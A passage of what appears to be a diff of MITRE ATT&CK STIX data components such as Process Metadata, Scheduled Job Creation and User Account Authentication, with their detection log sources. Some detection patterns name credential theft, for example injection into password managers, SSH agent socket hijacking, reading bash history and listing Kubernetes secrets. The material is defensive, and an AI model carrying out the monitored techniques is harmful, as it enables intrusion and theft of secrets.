+                            "name": "macos:osquery",
+                            "channel": "execve: Unsigned or unnotarized processes launched with high privileges"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "security OR injection attempts into 1Password OR LastPass"
+                        },
+                        {
+                            "name": "AndroidLogs:Kernel",
+                            "channel": "init or zygote process executing scripts or binaries from non-standard data or sdcard locations during early boot"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "launchd invocation of binary from non-Apple, non-AppStore, or sideloaded location during boot or shortly after unlock"
+                        },
+                        {
+                            "name": "AndroidLogs:Framework",
+                            "channel": "Creation of a new process running as system or root UID whose executable path resides under an app container path (for example, /data/app or /data/user/0/<pkg>), or whose parent process originates from an app sandbox"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Creation of a new process with elevated UID or sensitive entitlements whose binary path is associated with an app container or whose parent/caller is a low-privileged app/webcontent process"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "dlopen of a recently created .so OR short-lived child (/system/bin/sh,toybox,linker) spawned by app_process"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "startActivity on top of <target_pkg> (launchMode/singleTop), task switch immediately after focus"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "unexpected spikes in fork/exec/app process start events for helper utilities used for enumeration (ps, toybox/toolbox variants) from same UID"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application writes audio buffer or recorded audio file into application storage directories"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Browser or WebView-hosting application brought to foreground and navigates to external content, followed by abnormal state transition, crash, restart, or process spawn behavior"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application installed from adb, sideload, or unknown USB source"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application invokes Runtime.exec, ProcessBuilder, JNI-backed command launcher, or equivalent command-execution bridge immediately before shell or command process creation"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Managed app invokes lower-level OS process-launch or command-execution behavior before file or network effects, including interpreter-like execution flow where visible to sensor"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application execution triggered with unexpected parent context or via indirect invocation (intent redirection or component hijack)"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "mobile-attack",
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.773000+00:00\", \"old_value\": \"2026-04-13 15:49:16.424000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/datacomponents/DC0032\", \"old_value\": \"https://attack.mitre.org/data-components/DC0032\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.272000+00:00",
+                    "modified": "2026-05-12 15:12:00.778000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0034",
+                            "external_id": "DC0034"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Process Metadata",
+                    "description": "Contextual data about a running process, which may include information such as environment variables, image name, user/owner, etc.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Process",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem=com.apple.process"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
+                            "channel": "CodeIntegrity/WDAC events indicating unsigned/invalid DLL loads"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "sudo or service accounts invoking loaders with suspicious env vars"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Process Context"
+                        },
+                        {
+                            "name": "esxi:auth",
+                            "channel": "user session"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Admin activity"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve call for sudo where euid != uid"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem=com.apple.TCC"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec of binary with setuid/setgid and EUID != UID"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Use of fork/exec with DISPLAY unset or redirected"
+                        },
+                        {
+                            "name": "EDR:Telemetry",
+                            "channel": "Process lineage and API usage enrichment (GetSystemTime, GetTimeZoneInformation, NtQuerySystemTime)"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "/var/log/hostd.log API calls reading/altering time/ntp settings"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve, prctl, or ptrace activity affecting process memory or command-line arguments"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Cross-reference argv[0] with actual executable path and parent process metadata"
+                        },
+                        {
+                            "name": "WinEventLog:AppLocker",
+                            "channel": "AppLocker audit/blocks showing developer utilities executing scripts/binaries outside policy"
+                        },
+                        {
+                            "name": "EDR:hunting",
+                            "channel": "Correlation of signer info, parent-child lineage, rare invocation context (user host role), and API surfaces (CreateProcess*, LoadLibrary*)"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-Security-Mitigations/KernelMode",
+                            "channel": "ETW telemetry indicating ClickOnce deployment (dfsvc.exe) launching payloads"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-ClickOnce",
+                            "channel": "provider: Event Tracing for Windows (ETW) events associated with ClickOnce deployment (dfsvc.exe activity)"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-Windows Camera Frame Server/Operational",
+                            "channel": "Process session start/stop events for camera pipeline by unexpected executables"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "select: path LIKE '/dev/video%'"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "state=attached/debugged"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Code Execution & Entitlement Access"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process opening SSH_AUTH_SOCK or /tmp/ssh-* socket not owned by same UID"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "code signature/memory protection"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve with UID \u2260 EUID"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve with escalated privileges"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "cross-account or unexpected assume role"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log collect from launchd and process start"
+                        },
+                        {
+                            "name": "containerd:events",
+                            "channel": "Docker or containerd image pulls and process executions"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Kernel or daemon warnings of downgraded TLS or cryptographic settings"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modifications or writes to EFI system partition for downgraded bootloaders"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "non-shell process tree accessing bash history"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "process metadata mismatch between /proc and runtime attributes"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "process environment variables containing LD_PRELOAD"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "EventCode=400, 403"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Process Execution + Hash"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "process_start: EventHeader.ProcessId true parent vs reported PPID mismatch"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC, ES_EVENT_TYPE_NOTIFY_MMAP"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
+                            "channel": "Unsigned/invalid signature modules or images loaded by msbuild.exe or its children"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-DeviceGuard/Operational",
+                            "channel": "WDAC policy audit/block affecting msbuild.exe spawned payloads"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-SmartAppControl/Operational",
+                            "channel": "Smart App Control decisions (audit/block) for msbuild.exe-launched executables"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
+                            "channel": "Unsigned or untrusted modules loaded during JamPlus.exe runtime"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Crash or abnormal termination of security agent or system extension host"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "mobile-attack",
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.778000+00:00\", \"old_value\": \"2026-04-16 17:01:33.771000+00:00\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-03-13 20:00:38.029000+00:00",
+                    "modified": "2026-05-12 15:12:00.774000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0115",
+                            "external_id": "DC0115"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Protected Configuration",
+                    "description": "Protected Configuration represents security-sensitive device settings, security policies, or operating system configurations that are normally restricted to administrators, system services, or device management platforms.\nMonitoring these configurations enables detection of adversaries attempting to weaken device security controls or alter trusted device relationships.\n\nExamples\nAndroid:\n\n- USB debugging enabled\n- Unknown app installation allowed\n- Developer options enabled\n\niOS:\n\n- Developer mode enabled\n- Device pairing trust relationships established\n- Configuration profile restrictions modified\n",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Application Vetting",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "iOS:MDMLog",
+                            "channel": "Developer Mode enabled, supervised-device restriction changed, or trust-related protected device posture changed"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "Biometric, credential, lockscreen, trust-agent, Smart Lock, or device-admin-related protected device configuration changed"
+                        },
+                        {
+                            "name": "iOS:MDMLog",
+                            "channel": "Passcode, biometrics, attention-aware authentication, or supervised-device lock policy changed in a way that weakens or alters the authentication boundary"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "Managed Wi-Fi, VPN, cellular, or location-related policy state remains unchanged while network capability degrades"
+                        },
+                        {
+                            "name": "iOS:MDMLog",
+                            "channel": "Managed Wi-Fi, VPN, cellular, or location-service policy remains unchanged while device connectivity repeatedly degrades"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "Managed storage, backup, enterprise file access, or device policy state remains unchanged while bulk destructive file transformation occurs"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "Managed app catalog, enterprise update policy, or trusted distribution posture remains unchanged while a known app exhibits materially different post-update behavior"
+                        },
+                        {
+                            "name": "iOS:MDMLog",
+                            "channel": "Managed app distribution, supervised install posture, or provisioning trust context remains expected while a known app exhibits materially different behavior after version change"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "Managed app distribution, enterprise catalog trust, and update policy remain expected while a known package exhibits materially different post-install or post-update behavior"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.774000+00:00\", \"old_value\": \"2026-03-13 23:45:27.570000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/datacomponents/DC0115\", \"old_value\": \"https://attack.mitre.org/data-components/DC0115\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.271000+00:00",
+                    "modified": "2026-05-12 15:12:00.778000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0001",
+                            "external_id": "DC0001"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Scheduled Job Creation",
+                    "description": "The establishment of a task or job that will execute at a predefined time or based on specific triggers.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Scheduled Job",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4698"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Execution of non-standard script or binary by cron"
+                        },
+                        {
+                            "name": "WinEventLog:TaskScheduler",
+                            "channel": "EventCode=106"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "crontab, systemd_timers"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "launchd_jobs"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Startup script and task execution logs"
+                        },
+                        {
+                            "name": "kubernetes:apiserver",
+                            "channel": "verb=create, resource=cronjobs, group=batch"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "file_events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process: crontab edits, launch of cron job"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "file_events - cron, launchd"
+                        },
+                        {
+                            "name": "esxi:cron",
+                            "channel": "execution of scheduled job"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "task creation events"
+                        },
+                        {
+                            "name": "macos:cron",
+                            "channel": "cron/launchd"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4699"
+                        },
+                        {
+                            "name": "linux:cron",
+                            "channel": "Scheduled execution of unknown or unusual script/binary"
+                        },
+                        {
+                            "name": "MobiledEDR:telemetry",
+                            "channel": "Scheduled task execution creates cache, staged payload, local output, or collected data artifact immediately after wake or job trigger"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.778000+00:00\", \"old_value\": \"2026-04-09 17:05:23.355000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/datacomponents/DC0001\", \"old_value\": \"https://attack.mitre.org/data-components/DC0001\"}}}",
+                    "previous_version": "3.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-03-13 20:47:52.557000+00:00",
+                    "modified": "2026-05-12 15:12:00.778000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0117",
+                            "external_id": "DC0117"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "System Notifications",
+                    "description": "System Notifications represent operating system alerts, warnings, or status messages generated in response to application actions, system state changes, or security events. These notifications may indicate potentially malicious activity or abnormal application behavior.\n\nExamples\n\n- Application requesting sensitive permissions\n- USB device connected notifications\n- Security warnings triggered by device configuration changes\n\nCollection Methods\n\n- Mobile OS notification monitoring\n- Mobile EDR sensors\n- Device management telemetry\n",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "User Interface",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "\\\"has pasted from\\\" cross-app paste notification text containing source app name"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.778000+00:00\", \"old_value\": \"2026-03-10 15:59:54.007000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/datacomponents/DC0117\", \"old_value\": \"https://attack.mitre.org/data-components/DC0117\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-03-13 20:48:14.540000+00:00",
+                    "modified": "2026-05-12 15:12:00.773000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0118",
+                            "external_id": "DC0118"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "System Settings",
+                    "description": "System Settings represent user-visible or OS-level configuration settings that influence device behavior, application permissions, connectivity, or system features.\n\nMonitoring system settings changes allows defenders to detect abnormal modifications that may indicate malicious activity or device compromise.\n\n\nCollection Methods\n\n- MDM device telemetry\n- Mobile EDR monitoring\n- OS configuration monitoring\n",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "User Interface",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Microphone sensor activation or audio recording session initiated by application process"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application transitions to background or executes while screen locked during microphone session"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Cellular service state transitions (in-service\u2192no-service), SIM state change, carrier/operator identifier change, or baseband/telephony stack state change observed by agent telemetry"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application remains backgrounded while accessibility service continues to receive events or perform actions across other foreground apps"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "device USB mode change (charging to file transfer / debugging / accessory)"
+                        },
+                        {
+                            "name": "iOS:MDMLog",
+                            "channel": "Trusted computer / host relationship established or relevant device trust setting changed"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "Application or service remains active, foregrounds, or overlays during device locked state or immediately at unlock transition with weak recent user interaction context"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "No user-initiated airplane mode, radio disablement, or managed network setting change occurred during repeated connectivity degradation"
+                        },
+                        {
+                            "name": "iOS:MDMLog",
+                            "channel": "No user-initiated airplane mode or radio-related setting change occurred while applications experience repeated network unavailability"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Camera sensor access began from app identity and remained active for sustained capture interval in app context not mapped to approved video recording workflow"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Camera sensor access occurred while AppState=background, foreground service active without visible user action, or DeviceLockState=locked during capture interval"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Foreground service continues accessing camera, microphone, location, or other while-in-use sensors after service promotion and outside recent user interaction"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.773000+00:00\", \"old_value\": \"2026-04-08 20:14:04.248000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/datacomponents/DC0118\", \"old_value\": \"https://attack.mitre.org/data-components/DC0118\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.271000+00:00",
+                    "modified": "2026-05-12 15:12:00.777000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0002",
+                            "external_id": "DC0002"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "User Account Authentication",
+                    "description": "An attempt (successful and failed login attempts) by a user, service, or application to gain access to a network, system, or cloud-based resource. This typically involves credentials such as passwords, tokens, multi-factor authentication (MFA), or biometric validation.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "auditd:AUTH",
+                            "channel": "pam_unix or pam_google_authenticator invoked repeatedly within short interval"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "pam_authenticate, sshd"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execution of ssh, scp, or sftp using previously unseen credentials or keys"
+                        },
+                        {
+                            "name": "auditd:USER_LOGIN",
+                            "channel": "USER_AUTH"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "AssumeRole or ConsoleLogin with repeated MFA failures followed by repeated MFA requests"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "sts:GetFederationToken"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "AssumeRoleWithWebIdentity"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "AWS IAM: ListUsers, ListRoles"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "eventName=ConsoleLogin | eventType=AwsConsoleSignIn"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "ConsoleLogin or AssumeRole"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "ConsoleLogin, AssumeRole, ListAccessKeys, CreateUser"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Success logs from high-risk accounts"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Multiple MFA challenge requests without successful primary login"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "TokenIssued, TokenRenewed: Unexpected or anomalous token issuance events"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "SignIn: Sign-ins flagged as atypical (new geographic region, unfamiliar device id) shortly after correlated endpoint/browser compromise times"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Operation=UserLogin"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Unusual Token Usage or Application Consent"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "OperationName=SetDomainAuthentication OR Set-FederatedDomain"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Sign-in with unfamiliar location/device + portal navigation"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Login from newly created account"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Interactive/Non-Interactive Sign-In"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Reset password or download key from portal"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "status = failure"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Sign-in logs"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "SigninSuccess"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Failure Reason + UserPrincipalName"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Sign-in activity"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Sign-in logs / audit events"
+                        },
+                        {
+                            "name": "esxi:auth",
+                            "channel": "interactive shell or SSH access preceding storage enumeration"
+                        },
+                        {
+                            "name": "esxi:auth",
+                            "channel": "/var/log/auth.log"
+                        },
+                        {
+                            "name": "esxi:auth",
+                            "channel": "SSH session/login"
+                        },
+                        {
+                            "name": "esxi:vpxa",
+                            "channel": "user login from unexpected IP or non-admin user role"
+                        },
+                        {
+                            "name": "esxi:vpxd",
+                            "channel": "/var/log/vmware/vpxd.log"
+                        },
+                        {
+                            "name": "ESXiLogs:authlog",
+                            "channel": "Unexpected login followed by encoding commands"
+                        },
+                        {
+                            "name": "gcp:audit",
+                            "channel": "drive.activity"
+                        },
+                        {
+                            "name": "gcp:audit",
+                            "channel": "login.event"
+                        },
+                        {
+                            "name": "gcp:audit",
+                            "channel": "Sign-in logs / audit events"
+                        },
+                        {
+                            "name": "gcp:workspaceaudit",
+                            "channel": "Token Generation via Domain Delegation"
+                        },
+                        {
+                            "name": "GCPAuditLogs:login.googleapis.com",
+                            "channel": "Failed sign-in events"
+                        },
+                        {
+                            "name": "kubernetes:apiserver",
+                            "channel": "get/list requests to /api/v1/secrets or /api/v1/namespaces/*/serviceaccounts"
+                        },
+                        {
+                            "name": "kubernetes:apiserver",
+                            "channel": "authentication.k8s.io/v1beta1"
+                        },
+                        {
+                            "name": "kubernetes:audit",
+                            "channel": "Failed login"
+                        },
+                        {
+                            "name": "kubernetes:audit",
+                            "channel": "authentication.k8s.io"
+                        },
+                        {
+                            "name": "linux:auth",
+                            "channel": "sshd login"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "sudo/date/timedatectl execution by non-standard users"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "SSH failed login"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Failed password for invalid user"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "sshd[pid]: Failed password"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "authentication and authorization events during environmental validation phase"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "Logon failure"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "FailedLogin"
+                        },
+                        {
+                            "name": "m365:signinlogs",
+                            "channel": "Sign-in from anomalous location or impossible travel condition"
+                        },
+                        {
+                            "name": "m365:signinlogs",
+                            "channel": "UserLoginSuccess"
+                        },
+                        {
+                            "name": "m365:signinlogs",
+                            "channel": "Unusual sign-in from service principal to user mailbox"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Delegated permission grants without user login event"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "login using refresh_token with no preceding authentication context"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Sign-in logs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "successful sudo or authentication for account not normally associated with admin actions"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Login success without MFA step"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log show --predicate 'eventMessage contains \"Authentication\"'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "User credential prompt events without associated trusted installer package"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Login failure / authorization denied"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "auth"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Login Window and Authd errors"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "authd"
+                        },
+                        {
+                            "name": "network:auth",
+                            "channel": "repeated successful authentications with previously unknown accounts or anomalous password acceptance"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "config access, authentication logs"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "User privilege escalation to level 15/root prior to destructive commands"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "authorization/accounting logs"
